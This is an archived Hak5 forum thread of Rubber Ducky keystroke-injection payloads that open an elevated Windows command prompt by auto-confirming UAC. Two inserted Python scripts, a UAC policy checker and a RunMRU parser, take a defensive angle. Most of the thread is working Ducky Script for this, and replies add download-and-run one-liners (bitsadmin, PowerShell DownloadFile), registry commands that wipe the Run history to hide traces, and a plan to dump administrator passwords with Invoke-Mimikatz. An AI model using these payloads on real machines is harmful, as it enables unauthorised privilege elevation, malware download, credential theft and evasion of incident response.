Rubber Ducky

This discussion explores methods for "bypassing" the Windows User Account Control (UAC) consent dialog using a USB Rubber Ducky, a keystroke-injection device that enumerates as a keyboard and types a payload. Bypass here means auto-confirming the prompt rather than defeating it, a point one reply makes explicitly. The opening post gives three payloads for Windows 7: a Start-menu method (admin prompt in 9 seconds), a VBScript ShellExecute "runas" helper written from cmd (7 seconds) and a PowerShell Start-Process -Verb runAs one-liner (5 seconds). Later replies cut the delay further, one reaching 2.7 seconds with a runas command typed into the Run dialog, discuss the countermeasure (standard-user accounts, so that UAC asks for a password rather than a click), and cover cleaning up the Run-dialog history (RunMRU) the payload leaves behind.

Hak5 Forums: Active Projects / USB Rubber Ducky

This topic is now archived and is closed to further replies.

[Payload] Faster UAC Bypass
Started by Darren Kitchen, August 19, 2013

17 posts in this topic

Darren Kitchen (Hak5 Junkie)
Posted August 19, 2013

The duck is pretty good at bypassing UAC. Let's make it better.

REM *********************************
REM Payload: Old Method to Bypass UAC
REM Target: Windows 7
REM Author: Darren Kitchen
REM *********************************
GUI
DELAY 500
STRING cmd
DELAY 3000
MENU
DELAY 2000
STRING a
REM *************************************************************
REM Depending on Windows Version an ENTER could be necessary here
REM *************************************************************
DELAY 3000
LEFT
ENTER
DELAY 500
STRING echo Admin Prompt in 9 seconds

Not bad. Let's shave another 2 seconds off...

REM ********************************
REM Payload: Less Finicky UAC Bypass
REM Target: Windows 7
REM Author: Darren Kitchen
REM ********************************
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING copy con sudo.cmd
ENTER
STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs
ENTER
STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs
ENTER
STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs
ENTER
STRING @cscript %temp%\sudo.tmp.vbs
ENTER
CTRL z
ENTER
STRING sudo.cmd cmd
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 7 seconds

Not bad. Let's shave another 2 seconds off...

REM ********************************************
REM Payload: Fastest UAC Bypass using Powershell
REM Target: Windows 7
REM Author: Darren Kitchen
REM ********************************************
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 5 seconds

Not bad. Let's shave another 2 seconds off...?
Thoughts?

strangelaw (Newbie)
Posted August 19, 2013

(From Brutelogic) > bitsadmin /transfer n http://domain/file c:\%homepath%\file && c:\%homepath%\file

Darren Kitchen (Hak5 Junkie)
Posted August 19, 2013

BITSADMIN version 3.0 [7.5.7601]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Which is why....
powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe')

However cool, it still doesn't open a command prompt bypassing UAC.

overwraith (Hak5 Ninja)
Posted August 19, 2013

I found a website that has a way to turn off UAC by command line. Don't know if UAC will still bug you during the turn off procedure though.
http://www.howtogeek.com/howto/windows-vista/enable-or-disable-uac-from-the-windows-vista-command-line/

nikkelitous (Newbie)
Posted August 20, 2013

On 20/08/2013 at 4:06 AM, overwraith said:
    I found a website that has a way to turn off UAC by command line. Don't know if UAC will still bug you during the turn off procedure though.
    http://www.howtogeek.com/howto/windows-vista/enable-or-disable-uac-from-the-windows-vista-command-line/

Unfortunately, this method requires a reboot. Though it does completely disable UAC rather than just a one-off.

BuckoA51 (Hak5 Fan++)
Posted August 20, 2013

The countermeasure to this is, of course, don't run as admin, so that every time UAC pops up you have to put your admin password in. This is how a corporate desktop should be configured anyway, (or with UAC off and non-admin accounts for the staff).
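BuckoA51's countermeasure comes down to a few registry values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System: EnableLUA, ConsentPromptBehaviorAdmin, ConsentPromptBehaviorUser and PromptOnSecureDesktop. The Python below is an added example, not code from this thread or from Hak5; it reads those values with winreg on Windows (elsewhere it falls back to a constructed sample policy) and reports whether an elevation request from the logged-on user will produce a consent-only prompt, which is the only kind the ALT y payloads in this thread can answer. The sample policy dictionaries are constructed; the value meanings are the documented ones. One caveat worth stating: PromptOnSecureDesktop does not stop this device. The secure desktop blocks input injected by other processes, but the Rubber Ducky enumerates as a real USB keyboard, so its keystrokes reach the prompt like any other typing. Only a credential prompt (a standard-user account, or ConsentPromptBehaviorAdmin set to 1 or 3) or outright denial stops a payload that does not know the password.

```python
"""Assess whether a host's UAC policy yields a consent-only (click/ALT+y) prompt.

Added example, not code from the Hak5 thread. Reads the documented UAC policy
values under HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
via winreg on Windows, or uses a constructed sample policy elsewhere.
"""
import sys

POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
POLICY_VALUES = ("EnableLUA", "ConsentPromptBehaviorAdmin",
                 "ConsentPromptBehaviorUser", "PromptOnSecureDesktop")

# Documented meanings of ConsentPromptBehaviorAdmin (accounts in Admin Approval Mode).
ADMIN_BEHAVIOR = {
    0: "elevate without prompting",
    1: "prompt for credentials on the secure desktop",
    2: "prompt for consent on the secure desktop",
    3: "prompt for credentials",
    4: "prompt for consent",
    5: "prompt for consent for non-Windows binaries (Windows default)",
}
# Documented meanings of ConsentPromptBehaviorUser (standard users).
USER_BEHAVIOR = {
    0: "automatically deny elevation requests",
    1: "prompt for credentials on the secure desktop",
    3: "prompt for credentials (Windows default)",
}

# Constructed sample policies (not read from any real host).
DEFAULT_POLICY = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5,
                  "ConsentPromptBehaviorUser": 3, "PromptOnSecureDesktop": 1}
HARDENED_POLICY = dict(DEFAULT_POLICY, ConsentPromptBehaviorAdmin=1)
UAC_OFF_POLICY = {"EnableLUA": 0}


def assess_uac(policy, user_is_admin):
    """Describe how an elevation request will be handled for this user.

    keystroke_only is True when the prompt can be satisfied by a click or
    ALT+y alone, without typing a password: the condition the thread's
    Ducky payloads rely on.
    """
    if policy.get("EnableLUA", 1) == 0:
        # UAC off: admins already run elevated, standard users cannot elevate at all.
        return {"prompt": "none (UAC disabled)",
                "secure_desktop": False,
                "keystroke_only": user_is_admin}
    if user_is_admin:
        code = policy.get("ConsentPromptBehaviorAdmin", 5)
        prompt = ADMIN_BEHAVIOR.get(code, "unknown value %r" % (code,))
        keystroke_only = code in (0, 2, 4, 5)
    else:
        code = policy.get("ConsentPromptBehaviorUser", 3)
        prompt = USER_BEHAVIOR.get(code, "unknown value %r" % (code,))
        keystroke_only = False  # credential prompt or outright denial
    # Values 1 and 2 force the secure desktop; the others follow PromptOnSecureDesktop.
    secure = code in (1, 2) or policy.get("PromptOnSecureDesktop", 1) == 1
    return {"prompt": prompt, "secure_desktop": secure, "keystroke_only": keystroke_only}


def read_policy():
    """Read the live values on Windows; fall back to the constructed default elsewhere."""
    if not sys.platform.startswith("win"):
        return dict(DEFAULT_POLICY)
    import winreg
    policy = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POLICY_KEY) as key:
        for name in POLICY_VALUES:
            try:
                policy[name] = winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:
                pass  # absent value: Windows applies its default
    return policy


if __name__ == "__main__":
    live = read_policy()
    for admin in (True, False):
        who = "admin in Admin Approval Mode" if admin else "standard user"
        print("%s: %s" % (who, assess_uac(live, admin)))
```

Run it on the host being audited: a result with keystroke_only True for the account people actually log on with is the configuration BuckoA51 describes seeing during his audit, and the one every payload in this thread assumes.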


Darren Kitchen (Hak5 Junkie)
Posted August 20, 2013

On 20/08/2013 at 5:16 PM, BuckoA51 said:
    The countermeasure to this is, of course, don't run as admin, so that every time UAC pops up you have to put your admin password in. This is how a corporate desktop should be configured anyway, (or with UAC off and non-admin accounts for the staff).

Emphasis mine.

411Hall (Hak5 Fan+)
Posted August 26, 2013

Good stuff! I have replaced the Toolkit's method with this one.

BuckoA51 (Hak5 Fan++)
Posted August 30, 2013

Quote
    Emphasis mine.

Too true Darren, I know. Last company I was at doing a quick audit, they had Windows 7 and half the staff were running as admin with UAC on, the other half as admin with UAC disabled, because, you know, it's such a bind to click "Yes" every now and again.

tom564 (Hak5 Fan++)
Posted September 5, 2013

On 20/08/2013 at 0:49 AM, Darren Kitchen said:
    (quoted in full: the "Less Finicky UAC Bypass" and "Fastest UAC Bypass using Powershell" payloads from the opening post, ending "Not bad. Let's shave another 2 seconds off...? Thoughts?")

Having powershell Start-Process cmd.exe -Verb runAs as the last run command in the run prompt would make me suspicious if I saw it. Is there any way you can clean up after to remove the obvious trace?

Xcellerator (Hak5 Pirate)
Posted September 6, 2013

You can delete the entire history from the Run dialog using
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

or, you can specify what exact command you want removed with this:
for /f "tokens=1 delims=" %%A in ('reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Ru

or change "powershell Start-Process cmd.exe -Verb RunAs" to anything you like.
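Xcellerator's cleanup targets the Explorer RunMRU key, which is also the first place a responder would look after a suspected keystroke-injection incident. The Python below is an added example, not code from this thread or from Hak5. It parses the text that reg query prints for that key (the same output Xcellerator's for /f loop iterates over; the sample embedded here is constructed, not captured from a real host), orders the entries by the MRUList value so the most recent command comes first, and flags commands matching the elevation and download one-liners posted in this thread. The pattern list and the sample value names are assumptions for the example. Caveat: only the Run dialog writes RunMRU. The Start-menu search and Ctrl+Shift+Enter variants discussed later in the thread leave nothing there, so an empty key is not evidence that no payload ran.

```python
"""Triage the Explorer RunMRU key from `reg query` output.

Added example, not code from the Hak5 thread. The sample output below is
constructed, not captured from a real host.
"""
import re

RUN_MRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Constructed sample of what `reg query <RUN_MRU_KEY>` prints.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    notepad\1
    b    REG_SZ    powershell Start-Process cmd -Verb runAs\1
    c    REG_SZ    \\fileserver\share\1
    d    REG_SZ    cmd /c bitsadmin /transfer n http://domain/file %homepath%\file\1
    MRUList    REG_SZ    dbca
"""

# One `reg query` value line: name, type, data (data may contain spaces).
VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")

# Patterns taken from the one-liners posted in this thread (assumed list).
SUSPICIOUS = [re.compile(p, re.IGNORECASE) for p in (
    r"-verb\s+runas",   # powershell Start-Process ... -Verb runAs
    r"\brunas\b",       # runas.exe or ShellExecute "runas"
    r"shellexecute",
    r"\bcscript\b",
    r"\bbitsadmin\b",
    r"downloadfile",    # (new-object System.Net.WebClient).DownloadFile
)]


def parse_run_mru(text):
    """Return (entries, mru_list): value name -> command, and the MRUList string."""
    entries, mru_list = {}, ""
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if not m:
            continue
        name, _type, data = m.groups()
        if name == "MRUList":
            mru_list = data
        else:
            # Explorer stores each Run entry with a trailing "\1".
            entries[name] = data[:-2] if data.endswith("\\1") else data
    return entries, mru_list


def ordered_names(entries, mru_list):
    """Value names most-recent-first per MRUList; names missing from it go last."""
    names = [n for n in mru_list if n in entries]
    names += sorted(n for n in entries if n not in mru_list)
    return names


def recent_commands(text):
    """Every Run-dialog command on record, most recent first."""
    entries, mru_list = parse_run_mru(text)
    return [entries[n] for n in ordered_names(entries, mru_list)]


def flagged_value_names(text):
    """Names of the Run entries that match a thread pattern, most recent first."""
    entries, mru_list = parse_run_mru(text)
    return [n for n in ordered_names(entries, mru_list)
            if any(p.search(entries[n]) for p in SUSPICIOUS)]


if __name__ == "__main__":
    entries, _ = parse_run_mru(SAMPLE_REG_QUERY)
    for name in flagged_value_names(SAMPLE_REG_QUERY):
        print("%s: %s" % (name, entries[name]))
        # Targeted removal of just this value, the selective form of Xcellerator's cleanup:
        print("  reg delete %s /v %s /f" % (RUN_MRU_KEY, name))
```

Feed it the real output with `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU > runmru.txt` and read the file in place of SAMPLE_REG_QUERY. The value names it returns are what `reg delete ... /v <name> /f` needs, so the same parser serves both the responder looking for the trace and the operator removing one entry instead of wiping the key with /va.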

SN4T14 (Newbie)
Posted September 11, 2013

CONTROL ESCAPE
DELAY 200
STRING cmd
CTRL SHIFT ENTER
DELAY 2800
ALT y

Another 2 seconds shaved off. :)
Edit: Better version using the run menu, should work when there's a lot of entries in the start menu, and doesn't put an unnecessary "y" in the CMD window if UAC is off.
GUI R
DELAY 200
STRING runas /profile /user:%COMPUTERNAME%\Administrator "cmd"
ENTER
DELAY 2700
ALT y
DELAY 100
BACKSPACE

crackruckles (Newbie)
Posted September 16, 2013

1. Press the Win keyboard key or click on the Vista Start button.
2. Type cmd into the Start Search text box.
3. Press the Ctrl+Shift+Enter keyboard shortcut. Ctrl-Shift-Enter is the general keyboard shortcut that triggers elevation to Run as Administrator.
4. Press Alt+C or press Continue to confirm the UAC elevation warning prompt.
http://www.mydigitallife.info/how-to-open-elevated-command-prompt-with-administrator-privileges-in-windows-vista/

factgasm (Hak5 Fan++)
Posted December 3, 2013

The CTRL+SHIFT+ENTER combo works on the keyboard, but how do you code that in Ducky Script? Can Ducky Script handle three keys being pressed simultaneously?
I tried this script earlier and it didn't work:
DEFAULTDELAY 50
DELAY 3000
CONTROL ESCAPE
STRING cmd
CONTROL SHIFT ENTER
ALT Y
EXIT

googleknowsbest (Hak5 Fan)
Posted December 19, 2013

Dialogue box is not highlighted before the ALT y.
Win 8

Plazmaz (Newbie)
Posted August 19, 2014

You should be able to use this on Windows 8.1:
GUI X
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
ENTER
ALT y

MB60893 (Hak5 Zombie)
Posted September 6, 2014

Firstly, when you refer to "Bypass" UAC, what you are really saying is don't bring up the dialog box saying "Do you want to run xyz program as Administrator?". What I think would be better is to get administrator rights from a guest user's perspective, just about guaranteeing that any program would work if you needed to execute it.
If I knew someone who was an administrator, I would simply write a ducky script using the CTRL SHIFT ENTER command to elevate Powershell, then use the "Invoke-Mimikatz" command with "-DumpCreds". This would output the administrator password for the computer (providing it is not a Windows 8/8.1 machine).
I know there is a way you can execute a task as another user... so if you knew the administrator password for a computer, you could simply rock up as a guest, and run the task as an admin user. Thoughts?
